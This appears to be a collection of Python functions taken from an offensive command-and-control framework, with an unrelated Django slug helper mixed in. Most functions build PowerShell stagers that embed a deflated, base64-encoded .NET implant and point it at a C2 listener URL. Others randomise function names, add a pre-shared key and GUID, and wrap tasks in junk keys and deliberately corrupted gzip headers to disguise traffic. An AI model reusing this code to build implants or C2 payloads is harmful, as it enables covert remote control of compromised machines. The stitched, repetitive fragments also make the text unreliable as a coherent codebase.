def generate(self, listener, filename=None, as_string=False):
stager_filename = filename if filename else 'stager.ps1'
with open('stagers/templates/posh.ps1') as template:
template = template.read()
function_name = gen_random_string(4).upper()
c2_url = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
if bool(self.options['AsFunction']['Value']) is True:
template = f"""function Invoke-{function_name}
{{
[CmdletBinding()]
param (
[Parameter(Mandatory=$true)][String]$Url
)
{template}
}}
Invoke-{function_name} -Url "{c2_url}"
"""
else:
template = template.replace("$Url", f'"{c2_url}"')
if not as_string:
with open(stager_filename, 'w') as stager:
stager.write(template)
print_good(f"Generated stager to {stager.name}")
else:
return template
def generate(self, listener):
with open('./core/teamserver/data/naga.exe', 'rb') as assembly:
with open(
'core/teamserver/stagers/templates/posh.ps1') as template:
template = template.read()
c2_url = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
if bool(self.options['AsFunction']['Value']) is True:
function_name = gen_random_string(6).upper()
template = f"""function Invoke-{function_name}
{{
[CmdletBinding()]
param (
[Parameter(Mandatory=$true)][String]$Url
)
{template}
}}
Invoke-{function_name} -Url "{c2_url}"
"""
else:
template = template.replace("$Url", f'"{c2_url}"')
assembly = assembly.read()
template = template.replace(
"BASE64_ENCODED_ASSEMBLY",
dotnet_deflate_and_encode(assembly))
template = template.replace("DATA_LENGTH", str(len(assembly)))
return template
def generate(self, listener):
with open('./core/teamserver/data/naga.exe', 'rb') as assembly:
with open('core/teamserver/stagers/templates/posh.ps1') as template:
template = template.read()
c2_urls = ','.join(
filter(None, [f"{listener.name}://{listener['BindIP']}:{listener['Port']}", listener['CallBackURls']])
)
guid = uuid.uuid4()
psk = gen_stager_psk()
template = template.replace("ARGS_NAME", gen_random_string(6))
if bool(self.options['AsFunction']['Value']) is True:
function_name = gen_random_string(6).upper()
template = f"""function Invoke-{function_name}
{{
[CmdletBinding()]
param (
[Parameter(Mandatory=$true)][String]$Guid,
[Parameter(Mandatory=$true)][String]$Psk,
[Parameter(Mandatory=$true)][String]$Url
)
{template}
}}
Invoke-{function_name} -Guid '{guid}' -Psk '{psk}' -Url '{c2_urls}'
"""
else:
template = template.replace("$Url", f'"{c2_urls}"')
template = template.replace("$Guid", f'"{guid}"')
template = template.replace("$Psk", f'"{psk}"')
assembly = assembly.read()
template = template.replace("BASE64_ENCODED_ASSEMBLY", dotnet_deflate_and_encode(assembly))
template = template.replace("DATA_LENGTH", str(len(assembly)))
return guid, psk, template
def encode(self):
payload = b64encode(self.module.payload()).decode()
junk = {gen_random_string(): b64encode(token_bytes(5)).decode()}
job = {'id': self.id, 'command': 'run_script', 'data': payload}
stream = BytesIO()
with gzip.open(stream, 'wb') as gzip_stream:
gzip_stream.write(json.dumps(job).encode())
malform = bytearray(stream.getvalue())
malform[:2] = token_bytes(2)
junk['data'] = b64encode(bytes(malform)).decode()
return junk
async def send(self, ctx, cmd, args={}, data={}):
if self.selected and self.selected.stats.CONNECTED:
normalized_args = {}
for k, v in args.items():
if k in ['-h', '--help']:
continue
elif k.startswith("<"):
normalized_args[k[1:-1]] = v
elif k.startswith("--"):
normalized_args[k[2:]] = v
message = {
"id": gen_random_string(),
"ctx": ctx,
"cmd": cmd,
"args": normalized_args,
"data": data
}
return await self.selected.send(message)
print_bad("Not connected to a teamserver")
def generate(self, listener):
with open('core/teamserver/stagers/templates/posh.ps1') as template:
template = template.read()
function_name = gen_random_string(6).upper()
c2_url = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
if bool(self.options['AsFunction']['Value']) is True:
template = f"""function Invoke-{function_name}
{{
[CmdletBinding()]
param (
[Parameter(Mandatory=$true)][String]$Url
)
{template}
}}
Invoke-{function_name} -Url "{c2_url}"
"""
else:
template = template.replace("$Url", f'"{c2_url}"')
return template
def __init__(self, command=None, module=None):
self.id = gen_random_string()
self.status = 'initialized'
self.command = command
self.module = module
def __init__(self, command=None, module=None):
self.id = gen_random_string()
self.command = command
self.module = module
def add_slug(sender, instance, *args, **kwargs):
if instance and not instance.slug:
slug = slugify(instance.label)
random_str = gen_random_string()
instance.slug = slug + '-' + random_str
def __init__(self, command=None, module=None):
self.id = gen_random_string()
self.command = command
self.module = module
def __init__(self, module):
self.id = gen_random_string()
self.module = module